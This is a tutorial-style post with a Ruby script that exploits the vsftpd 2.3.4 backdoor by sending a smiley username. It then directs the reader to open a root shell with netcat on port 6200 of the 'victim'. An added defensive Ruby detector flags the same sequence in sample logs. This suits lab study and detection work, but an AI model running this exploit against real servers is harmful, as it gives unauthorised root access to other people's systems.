Creating Exploit for Vsftpd 2.3.4

Exploiting VSFTPD Manually

VSFTPD is an FTP server for Linux and other Unix-like operating systems.

The 2.3.4 version of VSFTPD contains a backdoor which, when triggered, gives a root shell.

Supplying a username that contains a smiley, ':)', triggers the backdoor, and shell access is given on port 6200. There's already a Metasploit exploit, but let's try to do this manually.

For now we'll write a Ruby script that just logs in to the vulnerable FTP server, and then we'll connect with netcat to obtain the root shell.

I've commented the lines to explain what each one does.


#!/usr/bin/env ruby

# Load the socket library
require 'socket'

# Open the socket to the IP supplied as the argument to the script
a = TCPSocket.open(ARGV[0], 21)

# Check the version of the FTP server from its banner
if a.gets =~ /vsFTPd 2\.3\.4/
  p 'Machine is Vulnerable Sending Exploit'
  # Send the username as evil:) to trigger the backdoor
  a.puts 'USER evil:)'
  p a.gets
  # Send the password
  a.puts 'PASS blah'
  p 'Exploit Execution Success!'
  p 'Connect on port TCP:6200 for root shell'
  a.close
else
  p 'Not Vulnerable, Quitting!'
  a.close
end


Here I saved the file as vsftpd.rb.

To run the code, type ruby vsftpd.rb followed by the IP of the FTP server (the script reads it from ARGV[0]).

Once the code has executed, you just need to connect to port 6200 on the victim machine to gain the root shell.

nc VictimIP 6200
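
The same sequence seen from the monitoring side, as an added example that is not part of the original post: it correlates the 2.3.4 banner, a USER name containing ':)' and a later connection to port 6200 on the same server. The record format (epoch, client, server, server port, sender, text), the 60-second window and the sample records are assumptions constructed for this example, not the output of any particular sensor.

```ruby
BANNER     = /vsFTPd 2\.3\.4/       # banner string the script above checks for
TRIGGER    = /\AUSER\s+.*:\)/i      # username containing the smiley
SHELL_PORT = 6200                   # port the backdoor shell listens on
WINDOW     = 60                     # assumed: seconds linking trigger and shell

Event = Struct.new(:ts, :client, :server, :port, :sender, :text)

# Assumed record format: "epoch client server server_port sender text"
def parse(line)
  ts, client, server, port, sender, text = line.strip.split(' ', 6)
  Event.new(ts.to_i, client, server, port.to_i, sender, text.to_s)
end

# Returns { server => { severity:, client:, ts: } } where severity is
#   :attempt - smiley username seen, server never announced 2.3.4
#   :exposed - smiley username sent to a server that announced 2.3.4
#   :shell   - a connection to tcp/6200 on that server followed within WINDOW
def detect(lines)
  announced = {}
  findings  = {}
  events = lines.map { |l| parse(l) }.sort_by.with_index { |e, i| [e.ts, i] }
  events.each do |e|
    if e.port == 21 && e.sender == 'S' && e.text =~ BANNER
      announced[e.server] = true
    elsif e.port == 21 && e.sender == 'C' && e.text =~ TRIGGER
      next if findings.dig(e.server, :severity) == :shell
      sev = announced[e.server] ? :exposed : :attempt
      findings[e.server] = { severity: sev, client: e.client, ts: e.ts }
    elsif e.port == SHELL_PORT && (f = findings[e.server]) && e.ts - f[:ts] <= WINDOW
      f[:severity] = :shell
    end
  end
  findings
end

# Constructed sample records (not captured traffic)
SAMPLE = <<~LOG.lines
  1700000000 10.0.0.5 10.0.0.20 21 S 220 (vsFTPd 2.3.4)
  1700000001 10.0.0.5 10.0.0.20 21 C USER evil:)
  1700000002 10.0.0.5 10.0.0.20 21 C PASS blah
  1700000005 10.0.0.5 10.0.0.20 6200 - connect
  1700000100 10.0.0.7 10.0.0.21 21 S 220 (vsFTPd 3.0.3)
  1700000101 10.0.0.7 10.0.0.21 21 C USER bob:)
  1700000200 10.0.0.8 10.0.0.20 21 C USER alice
LOG

detect(SAMPLE).each { |srv, f| puts "#{srv} #{f[:severity]} from #{f[:client]}" } if __FILE__ == $0
```

A :shell finding means the server should be treated as compromised; an :attempt against a server that never announced 2.3.4 is still worth recording as a probe.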